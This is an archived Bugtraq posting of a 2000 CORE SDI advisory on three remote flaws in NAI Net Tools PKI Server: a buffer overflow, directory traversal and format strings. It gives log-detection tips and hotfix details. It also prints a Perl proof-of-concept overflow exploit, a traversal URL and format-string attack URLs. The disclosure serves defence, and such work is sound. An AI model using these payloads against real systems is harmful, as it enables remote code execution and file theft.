Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

NAI Net Tools PKI Server vulnerabilities

From: Iván Arce <core.lists.bugtraq () CORE-SDI COM>
Date: Thu, 3 Aug 2000 00:32:40 -0300
-----------------------------------------------------------------------

                             CORE SDI S.A.
                        Buenos Aires, Argentina
                       <http://www.core-sdi.com>


                        CORE SDI Security Advisory
                             August 2nd, 2000

                NAI Net Tools PKI Server vulnerabilities

-----------------------------------------------------------------------

While investigating the exploitability of a buffer overflow in
the Net Tools PKI Server from Network Associates Inc. we discovered
three new vulnerabilities not fixed by hotfix 1, released to fix
problems reported by Jim Stickley from Garrison Technologies Inc.
(see http://www.securityfocus.com/bid/1363 and
 http://www.securityfocus.com/bin/1364)

Problem description
~~~~~~~~~~~~~~~~~~~~

 Problem #1: Buffer overflow in strong.exe

 A buffer overflow in the web server component of the
 Net Tools PKI server allows a remote attacker to execute
 arbitrary code as SYSTEM on the machine running it.

 To determine whether anyone has attempted to exploit this
 vulnerability, check the enroll-access.log and the
 admin-access.log files in the WebServer/logs directory of your
 Net Tools PKI Server installation. Search for any log entries
 which are excessively long (greater than 500 characters). Each
 log entry can then be examined to see the IP address of the
 computer that submitted the request.

 Problem #2: Directory traversal vulnerability

 The default installation of Net Tools PKI server allows
 a remote attacker to view and download any file residing
 on the server.

 To determine whether anyone has attempted to exploit this
 vulnerability, check the enroll-access.log and the
 admin-access.log files in the WebServer/logs directory of your
 Net Tools PKI Server installation. Search for any log entries
 containing "..\" within them. Each log entry can then be examined
 to see the IP address of the computer that submitted the request.

 Problem #3: Format strings with user supplied data

 The Net Tools PKI Server fail to validate properly the data
 passed as arguments to the server's logging routines and
 allows a remote attacker to execute arbitary code as
 SYSTEM on the machine running it.

Impact
~~~~~~

Problem #1: Remote unauthenticated access to the PKI Server,
            execution of arbitrary commands as the user running
            the enrollment server (System)

Problem #2: Remote unauthenticated access to any file on the PKI
            server

Problem #3: Remote unauthenticated access to the PKI Server,
            execution of arbitrary commands as the user running
            the enrollment server (System)

Technical details
~~~~~~~~~~~~~~~~~

 Problem #1: Buffer overflow in strong.exe

 Strong.exe is the web server component of the PKI Server,
 it services requests over SSL on ports 443/tcp, 444/tcp and
 445/tcp (default ports).
 While connections to port 443/tcp require both client and
 server autentication using certificates, connections to
 port 444/tcp requires no client authentication, therefore
 any user with network connectivity to the PKI server can
 connect via HTTPS to that port.

 The service running on port 443/tcp is called the
 Administrative Web Server and its therefore obvious the requirement for
 mutual authentication.
 The service running on port 444/tcp is the Enrollment Web Server
 and does not require a client side certificate by default.
 Both web servers are actually Virtual servers serviced by
 strong.exe

 A buffer overflow is present in the function that generates log data,
 that allows to overwrite the stack using user supplied data passed
 to the server as an URL in the HTTPS request.

  https://host:444/<2965 'A' chars>

EAX=66206465 EBX=00F3E1C0  ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B

The value in EAX is part of the string (DATE+PATH+FILE+REASON)
that gets logged, detailing the reason for the failure.
Since it is not a valid address, a segmentation fault is rised
a few instructions after the overwrite:

 mov ecx,[eax+000000E4]

 The above does not overwrite EIP and it kills the
 server before its overwritten, but a slight variation of it
 will let an attacker overwrite EBP, EIP and by carefully
 overwriting local variables, control the execution of arbitrary
 code on the target machine.

 A sample, proof of concept perl script exemplifies this:

-- cut here
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./pkiluso.pl > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000 juliano () core-sdi com

$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";

#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";;
print "\x90"x$noplen;
print
$shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
"\">Click here to exploit.!</a></body></html>";

note: wrapped for readability
----

 Problem #2: Directory traversal vulnerability

 By specifying '..\'  in HTTPS requests to the enrollment server,
 an attacker can navigate the server's file system and view/download
 any file if its name is known.
 By default the enrollment server uses
 \Program Files\Network Associates\Net Tools PKI
Server\WebServer\enroll-server
 as the Web Root directory, if a file name is known (ie. autoexec.bat)
 the attacker just needs to supply the remaining path components to
 access it:

  https://host:444/..\..\..\..\..\autoexec.bat

 will display the contents of the file in the browser

 If a filename is not known, the web server will reveal its
 web root directory in an error messages shown to the client:

 https://host:444..\..\pirulo.pdf will result in:

 File Not Found

 The requested URL /..\..\pirulo.pdf was not found on this server.

 There was also some additional information available about the error:
 [Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network
Associates\
 Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed
 for a.b.c.d, reason: File does not exist

 Problem #3: Format strings with user supplied data

 The user supplied URL is processed by Strong.exe and if the .XUDA
 extension is found, the request is forwarded to XUDAD.EXE for futher
 processing. Prior to this "hand-off" the URL string is parsed, filtered
 for metacharacters and passed to a function that logs the request.
 Somewhere along the processing path, the user supplied data becomes
 the format string for a formatted output function similar to the
 ANSI C sprintf(). This allows a remote attacker to provide data that
 will force that function into overwritting arbitrary portions of
 the process memory and cause either a denial of service attack or
 the execution of arbittrary code.

 To exemplify this, the following URL will cause a DoS:

 https://host:444/%25%25s.xuda

 Notice that the hex value 0x25 represent the ASCII character '%',
 thus the URL string will get converted to "%%s.xuda" and subsequentelly
 to "%s.xuda".

 A more elaborated attack, might try to overwrite the return address on
 the stack to force the server into executing arbitrary code.

 Proof of concept , sample URL:

 https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25\
 %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
 %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
 %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\
 %25x%25%25x%25x%25n.xuda

 note: the string has been wrapped for readability.


Fix information
~~~~~~~~~~~~~~~
  Network Associates Inc. has released Hotfix 3 for the Net Tools PKI
Server.
  It corrects the three problems. It can be obtained from:

   http://www.nai.com/asp_set/download/upgrade/find.asp

  Or contact Network Associates Technical support at 1-800-722-3709.

Vulnerable systems
~~~~~~~~~~~~~~~~~~
 Net Tools PKI server 1.0 for NT
 Net Tools PKI server 1.0 for NT (hotfix 1)
 Net Tools PKI server 1.0 for NT (hotfix 2)

Additional information
~~~~~~~~~~~~~~~~~~~~~~
 These vulnerabilities were discovered by Juliano Rizzo at CORE SDI S.A.

 Previous problems were found and reported to Network Associates Inc.
 by Jim Stickley from Garrison Technologies Inc.

 We wish to thank Network Associates Inc. for their prompt response
 to the issues rised by this advisory.


Copyright Notice:
~~~~~~~~~~~~~~~~~
The contents of this advisory are copyright (c) 2000 CORE SDI S.A. and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.

$Id: PKI_Server-advisory.txt,v 1.4 2000/08/02 18:15:40 iarce Exp $

--
"Understanding. A cerebral secretion that enables one having it to know
 a house from a horse by the roof on the house,
 It's nature and laws have been exhaustively expounded by Locke,
 who rode a house, and Kant, who lived in a horse." - Ambrose Bierce


==================[ CORE Seguridad de la Informacion S.A. ]=========
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836  B25D 207B E78E 2AD1 F65A
email   : iarce () core-sdi com
http://www.core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina.              Tel/Fax : +(54-11) 4331-5402
Casilla de Correos 877 (1000) Correo Central
=====================================================================

--- For a personal reply use iarce () core-sdi com
Previous By Date Next
Previous By Thread Next

Current thread: